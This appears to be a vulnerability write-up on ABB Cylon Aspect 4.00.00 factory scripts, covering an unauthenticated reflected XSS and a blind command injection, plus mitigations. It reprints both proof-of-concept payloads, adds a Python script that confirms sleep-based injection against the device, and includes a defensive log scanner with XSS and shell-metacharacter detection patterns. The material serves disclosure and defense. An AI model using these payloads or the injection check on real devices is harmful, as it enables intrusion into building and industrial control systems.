
An unauthenticated reflected Cross-Site Scripting (XSS) vulnerability has been identified in ABB Cylon Aspect firmware version 4.00.00, affecting the factorySaved.php script. The flaw, discovered by researcher Gjoko Krstic (LiquidWorm) of Zero Science Lab, allows an attacker to inject arbitrary JavaScript through the title GET parameter without authentication. Because the script belongs to the manufacturing workflow, the vulnerability primarily affects devices during the factory phase; if test scripts are not cleaned up after deployment, the attack window extends to fielded devices. As with any reflected XSS, exploitation still requires a user with browser access to the device to open the crafted URL.
Technical Overview
The vulnerability stems from insufficient input sanitization in factorySaved.php, a script normally used only during device manufacturing: the value of the title parameter is reflected into the response without sanitization or output encoding. An attacker can therefore craft a URL carrying a JavaScript payload in that parameter, as shown in the Proof of Concept (PoC):
http://192.168.73.31/factorySaved.php?title=<script>console.log('ZSL')</script>
Affected products include ABB’s NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, and ASPECT-Studio running firmware versions ≤4.00.00. ABB has declined to patch this issue, citing its limited exploitability once manufacturing is complete; nevertheless, factory scripts that survive into deployed environments remain a concern.
Additional Vulnerabilities
Zero Science Lab also reported a related Remote Code Execution (RCE) flaw in factorySetSerialNum.php, exploitable through blind OS command injection in the serial and ManufactureDate POST parameters. Because the command output is not returned to the client, the PoC confirms injection by timing: each parameter appends a sleep command, and a response delayed by the requested number of seconds shows that the injected command executed:
curl http://192.168.73.31/factorySetSerialNum.php -d "serial=;sleep 2&ManufactureDate=;sleep 3"
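A single slow response can be network jitter rather than an injected sleep, so a practitioner confirming this class of bug should probe one parameter at a time with increasing delays and accept the result only when the observed delay tracks the requested value. The following is an added Python example, not code from the ZSL advisory or the Exploit-DB entry. The device address and parameter names come from the PoC; the transport helper, the delay ladder and the tolerance are this example's own assumptions, and the simulated device at the end is constructed so the check runs offline.

```python
"""Timing-based confirmation of blind command injection in factorySetSerialNum.php.

Added example; the device address and parameter names mirror the published PoC,
while send_request, the delay ladder and `slack` are assumptions of this example.
"""
import time
import urllib.parse
import urllib.request

DEVICE = "http://192.168.73.31"          # assumed: the lab address used in the PoC
TARGET = DEVICE + "/factorySetSerialNum.php"


def build_body(param: str, delay: int) -> bytes:
    """Form body that injects `;sleep <delay>` into exactly one POST parameter.

    The other parameter stays benign so every probe measures a single sleep.
    """
    fields = {"serial": "", "ManufactureDate": ""}
    fields[param] = f";sleep {delay}"
    return urllib.parse.urlencode(fields).encode()


def send_request(body: bytes, timeout: float = 30.0) -> float:
    """Real transport (assumed): POST `body` to the device, return elapsed seconds."""
    req = urllib.request.Request(TARGET, data=body, method="POST")
    start = time.monotonic()
    with urllib.request.urlopen(req, timeout=timeout):
        pass
    return time.monotonic() - start


def is_time_injectable(measure, param="serial", delays=(0, 2, 4), slack=0.5) -> bool:
    """Report injection only if response time tracks the injected sleep.

    `measure(body) -> seconds` is the transport (real or simulated). The first
    delay is 0 and serves as the baseline; each later probe must exceed the
    baseline by at least (delay - slack) seconds and the extra time must keep
    growing, which rules out a single slow response caused by jitter.
    """
    timings = [measure(build_body(param, d)) for d in delays]
    baseline = timings[0]
    prev_extra = 0.0
    for delay, elapsed in zip(delays[1:], timings[1:]):
        extra = elapsed - baseline
        if extra < delay - slack or extra <= prev_extra:
            return False
        prev_extra = extra
    return True


def simulated_device(latency: float = 0.3, vulnerable: bool = True):
    """Constructed stand-in for the device so the check can run offline.

    Parses the injected `;sleep N` out of the form body and returns
    latency + N without actually sleeping; a 'patched' device ignores it.
    """
    def measure(body: bytes) -> float:
        fields = urllib.parse.parse_qs(body.decode(), keep_blank_values=True)
        total = latency
        if vulnerable:
            for values in fields.values():
                for v in values:
                    if v.startswith(";sleep "):
                        total += int(v.split()[1])
        return total
    return measure


if __name__ == "__main__":
    print("vulnerable (simulated):", is_time_injectable(simulated_device()))
    print("patched    (simulated):", is_time_injectable(simulated_device(vulnerable=False)))
    # Against a real device in a lab: is_time_injectable(send_request)
```

Probing each parameter separately also tells you which of the two fields is injectable, which the combined PoC request cannot distinguish.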
Earlier vulnerabilities in ABB Cylon Aspect 3.08.02, including unauthenticated command execution via deployStart.php and authenticated path traversal in ethernetUpdate.php, point to a recurring pattern of insufficient security controls in these factory and maintenance scripts.
Mitigation and Relevance
Organizations using ABB Cylon Aspect devices should:
- Verify that all factory test scripts (e.g., factorySaved.php and factorySetSerialNum.php) are removed or made unreachable after deployment
- Monitor web server logs and network traffic for requests to these scripts, including script-tag and shell-metacharacter payloads in request parameters
- Segment manufacturing networks from production environments
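As a concrete form of the monitoring item above, here is an added Python example, not code from ABB or Zero Science Lab, that scans web server access log lines for requests to the factory scripts named on this page and grades them by the payload found in the query string. The combined log format, the sample lines and the script list are constructed for the example; the device's real log format may differ, and the list should be extended with any other factory scripts found on a given firmware image.

```python
"""Flag access-log requests to ABB Cylon Aspect factory scripts.

Added example. The combined log format and SAMPLE_LOG are constructed for the
demo; FACTORY_SCRIPTS lists the scripts named in the advisories on this page.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Factory/maintenance scripts named on this page; extend as needed (assumed list)
FACTORY_SCRIPTS = {
    "/factorySaved.php",
    "/factorySetSerialNum.php",
    "/deployStart.php",
    "/ethernetUpdate.php",
}

# Combined log format: ip - - [ts] "METHOD target HTTP/x" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Reflected-XSS markers (script tag, javascript: URL, inline event handler)
XSS_RE = re.compile(r"<\s*script|javascript:|on\w+\s*=", re.I)
# Shell metacharacters or an explicit sleep, as used by time-based injection
CMDI_RE = re.compile(r"[;&|`$]|\bsleep\s+\d+")


def classify(line: str):
    """Return (severity, reason, path) for a suspicious line, or None.

    Any hit on a factory script is reported, because these scripts should not
    be reachable on a deployed device; a payload in the query raises severity.
    Query values are decoded per parameter so a legitimate '&' separator is
    not mistaken for a shell metacharacter.
    """
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if parts.path not in FACTORY_SCRIPTS:
        return None
    values = [v for vs in parse_qs(parts.query, keep_blank_values=True).values() for v in vs]
    decoded = "\n".join(values)
    if XSS_RE.search(decoded):
        return ("high", "script payload in query", parts.path)
    if CMDI_RE.search(decoded):
        return ("high", "shell metacharacters in query", parts.path)
    if m.group("method") == "POST":
        return ("medium", "POST to factory script (body not logged)", parts.path)
    return ("medium", "access to factory script", parts.path)


# Constructed sample log; line 2 carries the PoC payload from this page,
# line 3 mirrors the RCE PoC's POST, line 5 is an event-handler XSS variant.
SAMPLE_LOG = """\
10.0.5.20 - - [12/Mar/2025:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.5.77 - - [12/Mar/2025:10:01:09 +0000] "GET /factorySaved.php?title=%3Cscript%3Econsole.log%28%27ZSL%27%29%3C%2Fscript%3E HTTP/1.1" 200 340 "-" "curl/8.4"
10.0.5.77 - - [12/Mar/2025:10:01:15 +0000] "POST /factorySetSerialNum.php HTTP/1.1" 200 0 "-" "curl/8.4"
10.0.5.21 - - [12/Mar/2025:10:02:00 +0000] "GET /factorySaved.php?title=Saved HTTP/1.1" 200 340 "-" "Mozilla/5.0"
10.0.5.77 - - [12/Mar/2025:10:02:30 +0000] "GET /factorySaved.php?title=x%22%20onload%3Dalert(1) HTTP/1.1" 200 340 "-" "curl/8.4"
"""


def scan(log_text: str):
    """Return a list of (line_no, severity, reason, path) for suspicious lines."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        hit = classify(line)
        if hit:
            findings.append((n,) + hit)
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Because POST bodies are normally not logged, the command-injection PoC only shows up as a POST to factorySetSerialNum.php; on a deployed device that alone is worth an alert, since the script should not be there at all.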
This vulnerability is particularly relevant for industrial control system (ICS) environments where ABB devices are commonly deployed. If test scripts remain accessible, the unauthenticated XSS could give an attacker a foothold against operators who browse to the device, and the command injection a direct route to code execution on it.
Conclusion
The ABB Cylon Aspect vulnerabilities highlight persistent risks in industrial device manufacturing workflows. While the immediate impact is limited to specific phases of device lifecycle, improper handling of test scripts could expose critical infrastructure to exploitation. Organizations should conduct thorough audits of ABB device configurations and apply compensating controls where patches are unavailable.
References
- “ABB Cylon Aspect 4.00.00 – Unauthenticated XSS (Exploit-DB #52233)”. Exploit Database, 2025.
- “ZSL-2025-5893: ABB Cylon Aspect XSS Advisory”. Zero Science Lab, 2025.
- “ABB Cylon Aspect 4.00.00 – RCE (Exploit-DB #52232)”. Exploit Database, 2025.
- “ABB Cylon Aspect 3.08.02 Command Execution”. OXO Research, 2024.